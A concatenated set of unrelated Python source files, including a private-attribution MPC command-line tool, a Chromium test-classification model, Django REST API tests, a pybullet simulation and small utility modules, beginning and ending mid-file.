config: Dict[str, Any],
instance_id: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
# run pid instance through pid service invoked from pa service
instance = pa_service.id_match(
instance_id=instance_id,
protocol=PIDProtocol.UNION_PID,
pid_config=config["pid"],
server_ips=server_ips,
dry_run=dry_run,
)
logger.info(instance)
def prepare_compute_input(
config: Dict[str, Any],
instance_id: str,
logger: logging.Logger,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
uploaded_files = pa_service.prepare_data(
instance_id=instance_id,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logging.info(f"Uploaded files: {uploaded_files}")
logging.info("Finished preparing data")
def compute_attribution(
config: Dict[str, Any],
instance_id: str,
game: str,
attribution_rule: str,
aggregation_type: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
logging.info("Starting compute metrics...")
instance = pa_service.compute_attribute(
instance_id=instance_id,
game_name=game,
attribution_rule=attribution_rule,
aggregation_type=aggregation_type,
server_ips=server_ips,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logging.info("Finished running compute stage")
logger.info(instance)
def aggregate_shards(
config: Dict[str, Any],
instance_id: str,
game: str,
logger: logging.Logger,
server_ips: Optional[List[str]] = None,
dry_run: Optional[bool] = False,
log_cost_to_s3: bool = False,
) -> None:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_service.update_instance(instance_id)
instance = pa_service.aggregate_shards(
instance_id=instance_id,
game=game,
server_ips=server_ips,
dry_run=dry_run,
log_cost_to_s3=log_cost_to_s3,
)
logger.info(instance)
def get_instance(
config: Dict[str, Any], instance_id: str, logger: logging.Logger
) -> PrivateComputationInstance:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_instance = pa_service.update_instance(instance_id)
logger.info(pa_instance)
return pa_instance
def get_server_ips(
config: Dict[str, Any],
instance_id: str,
) -> List[str]:
pa_service = _build_pa_service(
config["private_attribution"], config["mpc"], config["pid"]
)
pa_instance = pa_service.update_instance(instance_id)
server_ips_list = None
last_instance = pa_instance.instances[-1]
if isinstance(last_instance, (PIDInstance, MPCInstance)):
server_ips_list = last_instance.server_ips
if not server_ips_list:
server_ips_list = []
print(*server_ips_list, sep=",")
return server_ips_list
def print_instance(
config: Dict[str, Any],
instance_id: str,
logger: logging.Logger) -> None:
print(get_instance(config, instance_id, logger))
def main() -> None:
s = schema.Schema(
{
"create_instance": bool,
"get_instance": bool,
"print_instance": bool,
"id_match": bool,
"prepare_compute_input": bool,
"compute_attribution": bool,
"aggregate_shards": bool,
"get_server_ips": bool,
"<instance_id>": schema.Or(None, str),
"--config": schema.And(schema.Use(PurePath), os.path.exists),
"--input_path": schema.Or(None, str),
"--output_dir": schema.Or(None, str),
"--game": schema.Or(None, str),
"--aggregation_type": schema.Or(None, str),
"--attribution_rule": schema.Or(None, str),
"--num_pid_containers": schema.Or(None, schema.Use(int)),
"--num_mpc_containers": schema.Or(None, schema.Use(int)),
"--num_files_per_mpc_container": schema.Or(None, schema.Use(int)),
"--padding_size": schema.Or(None, schema.Use(int)),
"--role": schema.Or(
None,
schema.And(
schema.Use(str.upper),
lambda s: s in ("PUBLISHER", "PARTNER"),
schema.Use(PrivateComputationRole),
),
),
"--k_anonymity_threshold": schema.Or(None, schema.Use(int)),
"--server_ips": schema.Or(None, schema.Use(lambda arg: arg.split(","))),
"--concurrency": schema.Or(None, schema.Use(int)),
"--hmac_key": schema.Or(None, str),
"--dry_run": bool,
"--log_path": schema.Or(None, schema.Use(Path)),
"--log_cost_to_s3": schema.Or(None, schema.Use(bool)),
"--verbose": bool,
"--help": bool,
}
)
arguments = s.validate(docopt(__doc__))
config = yaml.load(Path(arguments["--config"]))
log_path = arguments["--log_path"]
log_level = logging.DEBUG if arguments["--verbose"] else logging.INFO
logging.basicConfig(
filename=log_path,
level=log_level,
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
)
logger = logging.getLogger(__name__)
instance_id = arguments["<instance_id>"]
if arguments["create_instance"]:
logger.info(f"Create instance: {instance_id}")
# Optional arguments
hmac_key: Optional[str] = arguments["--hmac_key"]
padding_size: Optional[int] = arguments["--padding_size"]
concurrency: Optional[int] = arguments["--concurrency"]
k_anonymity_threshold: Optional[int] = arguments["--k_anonymity_threshold"]
create_instance(
instance_id=instance_id,
config=config,
input_path=arguments["--input_path"],
output_dir=arguments["--output_dir"],
role=arguments["--role"],
hmac_key=hmac_key or DEFAULT_HMAC_KEY,
num_pid_containers=arguments["--num_pid_containers"],
num_mpc_containers=arguments["--num_mpc_containers"],
num_files_per_mpc_container=arguments["--num_files_per_mpc_container"],
padding_size=padding_size or DEFAULT_PADDING_SIZE,
concurrency=concurrency or DEFAULT_CONCURRENCY,
k_anonymity_threshold=k_anonymity_threshold
or DEFAULT_K_ANONYMITY_THRESHOLD,
logger=logger,
)
elif arguments["get_instance"]:
logger.info(f"Get instance: {instance_id}")
get_instance(
config=config,
instance_id=instance_id,
logger=logger,
)
elif arguments["id_match"]:
logger.info(f"Run id match on instance: {instance_id}")
id_match(
config=config,
instance_id=instance_id,
logger=logger,
server_ips=arguments["--server_ips"],
dry_run=arguments["--dry_run"],
)
elif arguments["prepare_compute_input"]:
logger.info(f"Run id match on instance: {instance_id}")
prepare_compute_input(
config=config,
instance_id=instance_id,
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["compute_attribution"]:
logger.info(f"Compute instance: {instance_id}")
compute_attribution(
config=config,
instance_id=instance_id,
game=arguments["--game"],
attribution_rule=arguments["--attribution_rule"],
aggregation_type=arguments["--aggregation_type"],
server_ips=arguments["--server_ips"],
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["aggregate_shards"]:
aggregate_shards(
config=config,
instance_id=instance_id,
game=arguments["--game"],
server_ips=arguments["--server_ips"],
logger=logger,
dry_run=arguments["--dry_run"],
log_cost_to_s3=arguments["--log_cost_to_s3"],
)
elif arguments["get_server_ips"]:
get_server_ips(
config=config,
instance_id=instance_id,
)
elif arguments["print_instance"]:
print_instance(
config=config,
instance_id=instance_id,
logger=logger,
)
if __name__ == "__main__":
main()
|
import datetime as dt
import logging
from typing import Union
logger = logging.getLogger(__name__)
def get_monday(date: Union[dt.date, dt.datetime]):
if isinstance(date, dt.datetime):
date = date.date()
return date - dt.timedelta(days=date.weekday())
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
def has_module(module):
try:
__import__(module)
return True
except ImportError:
pass
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import defaultdict
from google.appengine.ext import ndb
from libs import time_util
from model.base_build_model import BaseBuildModel
from model.base_swarming_task import BaseSwarmingTask
class _ResultCount(ndb.Model):
"""Represent one result status and the count."""
status = ndb.StringProperty(indexed=False)
count = ndb.IntegerProperty(indexed=False)
class _ClassifiedTestResult(ndb.Model):
"""Represents classified result of one test."""
test_name = ndb.StringProperty(indexed=False)
# Total runs of the test in a rerun.
total_run = ndb.IntegerProperty(indexed=False)
# Number of runs with expected result.
num_expected_results = ndb.IntegerProperty(indexed=False)
# Number of runs with unexpected result.
num_unexpected_results = ndb.IntegerProperty(indexed=False)
# All the passing status and their counts.
passes = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the failing status and their counts.
failures = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the skipping status and their counts.
skips = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the unknown status and their counts.
unknowns = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
# All the unknown status and their counts.
notruns = ndb.LocalStructuredProperty(
_ResultCount, repeated=True, compressed=True)
@staticmethod
def _GetResultList(results):
return [
_ResultCount(status=status, count=count)
for status, count in results.iteritems()
]
@classmethod
def FromClassifiedTestResultObject(cls, test_name, classified_results):
result = cls()
result.test_name = test_name
result.total_run = classified_results.total_run
result.num_expected_results = classified_results.num_expected_results
result.num_unexpected_results = classified_results.num_unexpected_results
result.passes = cls._GetResultList(classified_results.results.passes)
result.failures = cls._GetResultList(classified_results.results.failures)
result.skips = cls._GetResultList(classified_results.results.skips)
result.unknowns = cls._GetResultList(classified_results.results.unknowns)
result.notruns = cls._GetResultList(classified_results.results.notruns)
return result
class WfSwarmingTask(BaseBuildModel, BaseSwarmingTask):
"""Represents a swarming task for a failed step.
'Wf' is short for waterfall.
"""
def _GetClassifiedTestsFromLegacyTestStatuses(self):
"""Classifies tests into lists of reliable and flaky tests from
legacy test statuses.
example legacy test statuses:
{
'test1': {
'total_run': 2,
'SUCCESS': 2
},
'test2': {
'total_run': 4,
'SUCCESS': 2,
'FAILURE': 2
},
'test3': {
'total_run': 6,
'FAILURE': 6
},
'test4': {
'total_run': 6,
'SKIPPED': 6
},
'test5': {
'total_run': 6,
'UNKNOWN': 6
}
}
example classified tests:
{
'flaky_tests': ['test1', 'test2'],
'reliable_tests': ['test3', 'test4'],
'unknown_tests': ['test5']
}
"""
tests = defaultdict(list)
for test_name, test_statuses in self.tests_statuses.iteritems():
if test_statuses.get('SUCCESS'): # Test passed for some runs, flaky.
tests['flaky_tests'].append(test_name)
elif test_statuses.get('UNKNOWN'):
tests['unknown_tests'].append(test_name)
else:
# Here we consider a 'non-flaky' test to be 'reliable'.
# If the test is 'SKIPPED', there should be failure in its dependency,
# considers it to be failed as well.
# TODO(chanli): Check more test statuses.
tests['reliable_tests'].append(test_name)
return tests
@property
def classified_tests(self):
"""Classifies tests into lists of reliable and flaky tests.
The swarming task is for deflake purpose, meaning Findit runs the task on
failed tests that it finds on waterfall.
So the classification should be:
* Flaky failure: Any test run succeeded or resulted in an expected status.
* Unknown failure: Test is not flaky, and any test run ended with an
unknown status.
* Reliable failure: All test runs failed or skipped unexpectedly.
example classified tests:
{
'flaky_tests': ['test1'],
'reliable_tests': ['test3'],
'unknown_tests': ['test2']
}
"""
if not self.classified_test_results:
return self._GetClassifiedTestsFromLegacyTestStatuses()
tests = defaultdict(list)
for classified_test_result in self.classified_test_results:
test_name = classified_test_result.test_name
if (classified_test_result.num_expected_results > 0 or
classified_test_result.passes):
# There are expected or successful runs for a test that failed on
# waterfall, classifies the test as a flake.
tests['flaky_tests'].append(test_name)
elif classified_test_result.unknowns or classified_test_result.notruns:
tests['unknown_tests'].append(test_name)
else:
# Here we consider a 'non-flaky' test to be 'reliable'.
# If the test has skipping results, there should be failure in its
# dependency, considers it to be failed as well.
tests['reliable_tests'].append(test_name)
return tests
@property
def reliable_tests(self):
return self.classified_tests.get('reliable_tests', [])
@property
def flaky_tests(self):
return self.classified_tests.get('flaky_tests', [])
@property
def reproducible_flaky_tests(self):
tests = []
if not self.classified_test_results:
# For Legacy data.
for test_name, test_statuses in self.tests_statuses.iteritems():
if (test_statuses.get('SUCCESS') and
test_statuses['SUCCESS'] < test_statuses['total_run']):
# Test has passed and not passed runs, confirmed to be flaky.
tests.append(test_name)
return tests
for classified_test_result in self.classified_test_results:
test_name = classified_test_result.test_name
if (classified_test_result.num_expected_results > 0 and
classified_test_result.num_unexpected_results > 0):
# Test has expected and unexpected runs, confirmed to be flaky.
tests.append(test_name)
return tests
@ndb.ComputedProperty
def step_name(self):
return self.key.pairs()[1][1]
@staticmethod
def _CreateKey(master_name, builder_name, build_number,
step_name): # pragma: no cover
build_key = BaseBuildModel.CreateBuildKey(master_name, builder_name,
build_number)
return ndb.Key('WfBuild', build_key, 'WfSwarmingTask', step_name)
@staticmethod
def Create(master_name, builder_name, build_number,
step_name): # pragma: no cover
task = WfSwarmingTask(
key=WfSwarmingTask._CreateKey(master_name, builder_name, build_number,
step_name))
task.parameters = task.parameters or {}
task.tests_statuses = task.tests_statuses or {}
task.requested_time = time_util.GetUTCNow()
return task
@staticmethod
def Get(master_name, builder_name, build_number,
step_name): # pragma: no cover
return WfSwarmingTask._CreateKey(master_name, builder_name, build_number,
step_name).get()
@staticmethod
def GetClassifiedTestResults(results):
"""Gets classified test results and populates data to
_ClassifiedTestResults.
Args:
results(ClassifiedTestResults): A plain dict-like object for classified
test results.
"""
return [
_ClassifiedTestResult.FromClassifiedTestResultObject(test_name, result)
for test_name, result in results.iteritems()
]
# Classified test results.
classified_test_results = ndb.LocalStructuredProperty(
_ClassifiedTestResult, repeated=True, compressed=True)
|
from __future__ import annotations
from abc import ABC
from typing import Callable, Dict, Iterable, Optional, Union
from datasets._typing import ColumnNames
from datasets.context import Context
from datasets.utils import _is_upper_pascal_case
from .mode import Mode
from .program_executor import ProgramExecutor
class DatasetPlugin(ABC):
"""
All dataset plugins derive from this class.
To register as a dataset they must decorate themselves with or call DatasetPlugin.register()
"""
_executor: ProgramExecutor
# Context -> constructor_keys -> dataset plugin
_plugins: Dict[Context, Dict[set[str], DatasetPlugin]] = {}
_META_COLUMNS = ["run_id"]
def __init__(
self,
name: str,
logical_key: Optional[str] = None,
columns: Optional[ColumnNames] = None,
run_id: Optional[str] = None,
mode: Union[Mode, str] = Mode.READ,
):
"""
:param name: The dataset logical name.
:param logical_key:
The logical primary key, strongly suggested, and can later be
used when creating Hive/Dynamo tables or registering with a Catalog.
:param columns: Fetch columns
:param run_id: The program run_id partition to select from.
:param mode: The data access read/write mode
"""
dataset_name_validator(name)
self.name = name
self.key = logical_key # TODO: validate this too!
self.mode: Mode = mode if isinstance(mode, Mode) else Mode[mode]
self.columns = columns
self.run_id = run_id
@classmethod
def from_keys(cls, context: Optional[Union[Context, str]] = None, **kwargs) -> DatasetPlugin:
"""
Factory method for datasets. Not directly used by the user.
For example usage please see test_from_keys*() unit tests.
:param context: If not specified it uses the current executor context.
:param kwargs: dataset constructor args
:return: found DatasetPlugin
"""
dataset_args = set(kwargs.keys())
context_lookup = cls._get_context(context)
default_plugin: Optional[DatasetPlugin] = None
max_intersect_count = 0
ret_plugin = None
for plugin_context in (
plugin_context for plugin_context in cls._plugins.keys() if context_lookup & plugin_context
):
for plugin_constructor_keys, plugin in cls._plugins[plugin_context].items():
if plugin_constructor_keys.issubset(dataset_args):
if plugin_constructor_keys == {"name"}:
default_plugin = plugin
else:
match_count = len(plugin_constructor_keys.intersection(dataset_args))
if match_count > max_intersect_count:
max_intersect_count = match_count
ret_plugin = plugin
if ret_plugin:
return ret_plugin(**kwargs)
elif default_plugin:
return default_plugin(**kwargs)
else:
raise ValueError(f"f{kwargs} and {context_lookup=} not found in {cls._plugins}")
@classmethod
def _get_context(cls, context: Optional[Union[Context, str]] = None) -> Context:
if context:
return context if isinstance(context, Context) else Context[context]
else:
return cls._executor.context
@classmethod
def register(cls, constructor_keys: set[str], context: Context) -> Callable:
"""
Registration method for a dataset plugin.
Plugins are looked up by (constructor_keys, context), so no two can be registered at the same time.
Plugins are constructed by from_keys(), by ensuring that the current
ProgramExecutor.context == plugin.context
and that plugin.constructor_keys.issubset(dataset_arguments)
constructor_keys="name" is a special case and is loaded last if no other plugins are found
:param constructor_keys: set of dataset constructor keys
:param context: defaults to batch, but is the context this plugin supports
:return: decorated class
"""
if constructor_keys is None:
raise ValueError("constructor_keys cannot be None!")
if context is None:
raise ValueError("context cannot be None!")
if not isinstance(context, Context):
raise ValueError(f"{context=} is not of type(Context)!")
def inner_wrapper(wrapped_class: DatasetPlugin) -> DatasetPlugin:
if context not in cls._plugins:
cls._plugins[context] = {}
keys = frozenset(constructor_keys)
if keys in cls._plugins[context] and wrapped_class != cls._plugins[context][keys]:
raise ValueError(
f"{constructor_keys} already registered as a " f"dataset plugin as {context}!"
)
cls._plugins[context][keys] = wrapped_class
return wrapped_class
return inner_wrapper
@classmethod
def register_executor(cls, executor: ProgramExecutor):
cls._executor = executor
def _get_read_columns(self, columns: Optional[ColumnNames] = None) -> Optional[Iterable[str]]:
read_columns = columns if columns else self.columns
if read_columns is not None and isinstance(read_columns, str):
read_columns = read_columns.split(",")
return read_columns
def __repr__(self):
return f"DatasetPlugin({self.name=},{self.mode=},{self.key=},{self.columns=})"
def _validate_dataset_name(name: str):
if not _is_upper_pascal_case(name):
raise ValueError(
f"'{name}' is not a valid Dataset name. "
f"Please use Upper Pascal Case syntax: https://en.wikipedia.org/wiki/Camel_case"
)
else:
pass
dataset_name_validator: Callable = _validate_dataset_name
|
import re, math
import pandas as pd
import gcsfs as gcsfs
def read_csv_gcs(filename , header=None):
# # read file from gcs
# fs = gcsfs.GCSFileSystem(project='careerograph-e9963')
# with fs.open(filename) as f:
# df = pd.read_csv(f,header=header)
# return df
return True
# performs preprocessing on a list of skills
def preprocess_skillset(skillset):
tempSkillset = list()
for skill in skillset:
# remove the trailing space, replace space with underscore,
skill = skill.strip()
skill = skill.replace(" ", "_")
skill = re.sub(r'\W+', '_', skill)
tempSkillset.append(skill.lower())
return tempSkillset
def create_idf(map ,skills , count):
idf = list()
# get idf for each skill
for skill in skills:
idf.append(math.log(count/map[skill]))
return idf
def create_mapping(skillset):
# create mapping for every skill and its count ex: html: 2
mapping = dict()
for skill in skillset:
if skill not in mapping:
mapping[skill] = 1
else:
mapping[skill] += 1
return mapping |
import pandas as pd
import time
import math
import pdb
import os
import gc
class Logger:
def __init__(self):
self.d = []
self.num_rows = 0
def log(self, info):
self.d.append(info)
def save(self, path, append=True):
df = pd.DataFrame(self.d).apply(pd.to_numeric, errors='coerce', downcast='float')
df.index += self.num_rows
self.num_rows += len(df)
df.to_hdf(path + '.h5', key='log', append=append, format='table')
if append:
self.d.clear()
class Progress:
def __init__(self, total, name = 'Progress', ncol=3, max_length=20, indent=0, line_width=100, speed_update_freq=100):
self.total = total
self.name = name
self.ncol = ncol
self.max_length = max_length
self.indent = indent
self.line_width = line_width
self._speed_update_freq = speed_update_freq
self._step = 0
self._prev_line = '\033[F'
self._clear_line = ' ' * self.line_width
self._pbar_size = self.ncol * self.max_length
self._complete_pbar = '#' * self._pbar_size
self._incomplete_pbar = ' ' * self._pbar_size
self.lines = ['']
self.fraction = '{} / {}'.format(0, self.total)
self.resume()
def update(self, n=1):
self._step += n
if self._step % self._speed_update_freq == 0:
self._time0 = time.time()
self._step0 = self._step
def resume(self):
self._skip_lines = 1
print('\n', end='')
self._time0 = time.time()
self._step0 = self._step
def pause(self):
self._clear()
self._skip_lines = 1
def set_description(self, params=[]):
############
# Position #
############
self._clear()
###########
# Percent #
###########
percent, fraction = self._format_percent(self._step, self.total)
self.fraction = fraction
#########
# Speed #
#########
speed = self._format_speed(self._step)
##########
# Params #
##########
num_params = len(params)
nrow = math.ceil(num_params / self.ncol)
params_split = self._chunk(params, self.ncol)
params_string, lines = self._format(params_split)
self.lines = lines
description = '{} | {}{}'.format(percent, speed, params_string)
print(description)
self._skip_lines = nrow + 1
def append_description(self, descr):
self.lines.append(descr)
def _clear(self):
position = self._prev_line * self._skip_lines
empty = '\n'.join([self._clear_line for _ in range(self._skip_lines)])
print(position, end='')
print(empty)
print(position, end='')
def _format_percent(self, n, total):
if total:
percent = n / float(total)
complete_entries = int(percent * self._pbar_size)
incomplete_entries = self._pbar_size - complete_entries
pbar = self._complete_pbar[:complete_entries] + self._incomplete_pbar[:incomplete_entries]
fraction = '{} / {}'.format(n, total)
string = '{} [{}] {:3d}%'.format(fraction, pbar, int(percent*100))
else:
fraction = '{}'.format(n)
string = '{} iterations'.format(n)
return string, fraction
def _format_speed(self, n):
num_steps = n - self._step0
t = time.time() - self._time0
speed = num_steps / t
string = '{:.1f} Hz'.format(speed)
if num_steps > 0:
self._speed = string
return string
def _chunk(self, l, n):
return [l[i:i+n] for i in range(0, len(l), n)]
def _format(self, chunks):
lines = [self._format_chunk(chunk) for chunk in chunks]
lines.insert(0,'')
padding = '\n' + ' '*self.indent
string = padding.join(lines)
return string, lines
def _format_chunk(self, chunk):
line = ' | '.join([self._format_param(param) for param in chunk])
return line
def _format_param(self, param):
k, v = param
return '{} : {}'.format(k, v)[:self.max_length]
def stamp(self):
if self.lines != ['']:
params = ' | '.join(self.lines)
string = '[ {} ] {}{} | {}'.format(self.name, self.fraction, params, self._speed)
self._clear()
print(string, end='\n')
self._skip_lines = 1
else:
self._clear()
self._skip_lines = 0
def close(self):
self.pause()
class Silent:
def __init__(self, *args, **kwargs):
pass
def __getattr__(self, attr):
return lambda *args: None
|
"""Implementation of a stack."""
from linked_list import LinkedList
class Stack(object):
"""Class for a stack."""
def __init__(self, iterable=None):
"""Function to create an instance of a stack."""
self.length = 0
self._stack = LinkedList()
self.top = None
if isinstance(iterable, (str, tuple, list)):
for i in iterable:
self.push(i)
def pop(self):
"""Use LinkedList pop method."""
"""Remove the head of the list and return it."""
if self.top is None:
raise IndexError("List is empty, cannot pop from an empty list")
val = self.top.val
self.top = self.top.next_node
self.length -= 1
return val
def push(self, val):
"""Use push method from LinkedList."""
self._stack.push(val)
self.top = self._stack.head
def __len__(self):
"""Redifine the built in len function for the list."""
return self._stack.length
|
"""Implementation of the clear command."""
from mcipc.rcon.client import Client
__all__ = ['clear']
def clear(self: Client, player: str = None, item_name: str = None,
data: int = None, max_count: int = None) -> str:
"""Clears items from player inventory, including
items being dragged by the player.
Bedrock Edition implementation.
"""
return self.run('clear', player, item_name, data, max_count)
|
default_app_config = 'event.providers.eventbrite_provider.apps.EventbriteProviderConfig'
|
# -*- coding: utf-8 -*-
name = 'colourise'
version = '0.4.0'
description = (
'If output to Terminal, colourise the piped input '
'text base off some rules.'
)
authors = ['WWFX UK']
# Technically needs bash. Tested rez on Linux and OSX CI with bash
requires = ['platform-linux|osx']
tools = ['colourise', 'colour-test'] # Names of executables from this package
# ---- OR ----
# @late()
# def tools():
# """Dynamically get a list of binaries/wrappers from our bin folder.
#
# Returns:
# list[str]: Names of binaries from the bin folder.
# """
# import os
# exe_names = []
#
# for name in os.listdir(this.root):
# full_path = os.path.join(this.root, name)
# if os.access(full_path, os.X_OK) and not os.path.isdir(full_path):
# exe_names.append(name)
#
# return exe_names
# # Technically needs tar, gzip and curl but they tend to come with OS
# build_requires = [] # Build-time packages required by this package
# To Do: Fails on Windows, rez will run build_command with cmd
build_command = r'''
set -euf -o pipefail
if [[ $REZ_BUILD_INSTALL -eq 1 ]]
then
cp -v \
$REZ_BUILD_SOURCE_PATH/colourise \
$REZ_BUILD_SOURCE_PATH/colour-test \
$REZ_BUILD_INSTALL_PATH
fi
'''
def commands():
"""Commands to set up environment for ``rez env colourise``"""
env.PATH.append('{root}')
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test the publicly available Tags API"""
def setUp(self):
self.client = APIClient()
def test_auth_required(self):
"""Test that authentication is required for retrieving tags"""
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorised user Tags API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
'random@random.com',
'Password1'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieve tags"""
# Given
Tag.objects.create(user=self.user, name='Dessert')
Tag.objects.create(user=self.user, name='Starter')
# When
response = self.client.get(TAGS_URL)
# Then the request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then the tags are returned
expected_tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(expected_tags, many=True)
expected_data = serializer.data
self.assertEqual(response.data, expected_data)
def test_retrieve_tags_only_for_user(self):
"""Test retrieve on tags for authenticated user only"""
# Given authenticated user has a tag
expected_tag = Tag.objects.create(user=self.user, name='Dairy Free')
# Given another user also has a tag
other_user = get_user_model().objects.create_user(
'other_user@random.com',
'MOCK_OTHER_PASSWORD'
)
Tag.objects.create(user=other_user, name='MOCK_OTHER_TAG_NAME')
# When
response = self.client.get(TAGS_URL)
# Then the request is successful
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Then only the tags belonging to the auth'd user are returned
self.assertEqual(len(response.data), 1)
self.assertEqual(response.data[0]['name'], expected_tag.name)
def test_create_tag_success(self):
"""Test create a new tag"""
# Given
payload = {'name': 'TAG_NAME'}
# When
self.client.post(TAGS_URL, payload)
# Then
exists = Tag.objects.filter(
user=self.user,
name=payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid_name_failure(self):
"""Test creating a tag with invalid payload"""
# Given
payload = {'name': ''}
# When
response = self.client.post(TAGS_URL, payload)
# Then
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned to recipes"""
# Given
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Eggs Benedict',
time_minutes=10,
price=4.00,
user=self.user
)
recipe.tags.add(tag1)
# When
response = self.client.get(TAGS_URL, {'assigned_only': 1})
# Then
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1.data, response.data)
self.assertNotIn(serializer2.data, response.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
# Given
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Drop scones',
time_minutes=15,
price=2.50,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=5,
price=1.50,
user=self.user
)
recipe2.tags.add(tag)
# When
response = self.client.get(TAGS_URL, {'assigned_only': 1})
# Then
self.assertEqual(len(response.data), 1)
|
"""
Question 67 :
Write a program using generator to print the numbers which can be
divisible by 5 and 7 between 0 and n in comma separated form while
n is console input.
Example : If the following n is input to the program : 100
Then, the output of the program should be : 0, 35, 70
Hints : Use yield to produce the next values in generator
In case of input beging supplied to the question, it should be
assumed to be a console input.
"""
# Solution :
def num_div(n):
for i in range(n + 1):
if i%5 == 0 and i%7 == 0:
yield i
n = int(input("Enter a number : "))
values = []
for i in num_div(n):
values.append(str(i))
print(",".join(values))
"""
Output :
Enter a number : 100
0,35,70
""" |
import pybullet as p
import time
import math
import numpy as np
import random
p.connect(p.GUI)
p.loadURDF("plane.urdf",[0,0,-.2],globalScaling=6.0,useFixedBase=True)
cylId = p.loadURDF("simple_cylinder.urdf",[0,0,0.2],globalScaling=6.0,useFixedBase=False)
cubeId = p.loadURDF("cube.urdf",[2,2,0],globalScaling=0.6,useFixedBase=False)
t = 0
g = False
def eachIter():
p.setGravity(0,0,-10)
p.stepSimulation()
time.sleep(.002)
def increment(tup, ix, val):
temp = list(tup)
temp[ix] += val
return tuple(temp)
def applyAction(angle,offset):
cylPos, cylOrn = p.getBasePositionAndOrientation(cylId)
cubePos, cubeOrn = p.getBasePositionAndOrientation(cubeId)
cubeNewPos = [cylPos[0] + math.cos(math.radians(angle)),cylPos[1] + math.sin(math.radians(angle)),0]
vec = np.array([cylPos[0]-cubeNewPos[0],cylPos[1]-cubeNewPos[1],0])
vec = vec / np.linalg.norm(vec)
look = [0,0,math.atan(vec[0]/(-vec[1]))]
cubeNewPosWithOffset = cubeNewPos
cubeNewPosWithOffset[0] -= offset*math.sin(math.radians(angle))
cubeNewPosWithOffset[1] += offset*math.cos(math.radians(angle))
p.resetBasePositionAndOrientation(cubeId,cubeNewPosWithOffset,p.getQuaternionFromEuler(look))
for i in range(100):
eachIter()
for i in range(100):
p.applyExternalForce(cubeId, -1, 20*np.array(vec), cubeNewPos, flags = p.WORLD_FRAME)
eachIter()
for i in range(400):
eachIter()
cubePos, cubeOrn = p.getBasePositionAndOrientation(cubeId)
print np.array(list(cubePos)) - cubeNewPosWithOffset
actions = [(10,100),(190,100)]
while (1):
# a = [int(x) for x in raw_input().split()]
for i in range(1000):
angle = random.randint(0,360)
offset = random.uniform(-0.3, 0.3)
print angle, offset
applyAction(angle, offset)
# applyAction(*a)
eachIter()
t+=1
|
#!/usr/bin/env python3
import asyncio
import time
import ipaddress
import random
import prime
def measure_time(func):
async def wrapper(*params):
start = time.monotonic()
res = await func(params)
end = time.monotonic()
duration = float(end - start)
return (res, duration)
return wrapper
@measure_time
async def ping(ip):
await asyncio.sleep(random.randint(1, 10), loop=loop)
# res = await prime.calc_primes(random.randint(5, 22222))
return False
async def print_ping(ip):
responding, duration = await ping(ip)
print("IP: %s - %s [%f]" % (ip, responding, duration))
def main(ip_range):
global loop
loop = asyncio.get_event_loop()
res = []
tasks = []
for ip in ip_range:
ip_addr = ipaddress.ip_address(ip)
tasks.append(asyncio.ensure_future(print_ping(ip)))
loop.run_until_complete(asyncio.gather(*tasks))
loop.close()
if __name__ == '__main__':
main(range(0, 100000))
# loop.run_until_complete(main(loop, range(0, 10000)))
|
#UTF-8
def stoper(x_object, y_object, side, stop_kords=False):
if stop_kords != False:
stop = True
if side == 0:
for i in stop_kords:
temp = i.split(' ')
x1 = int(temp[0])
y1 = int(temp[1])
x2 = int(temp[2])
y2 = int(temp[3])
if x_object + 48 >= x1 and x_object + 2 <= x2 and y_object + 52 >= y1 and y_object + 28 <= y2:
stop = False
if side == 1:
for i in stop_kords:
temp = i.split(' ')
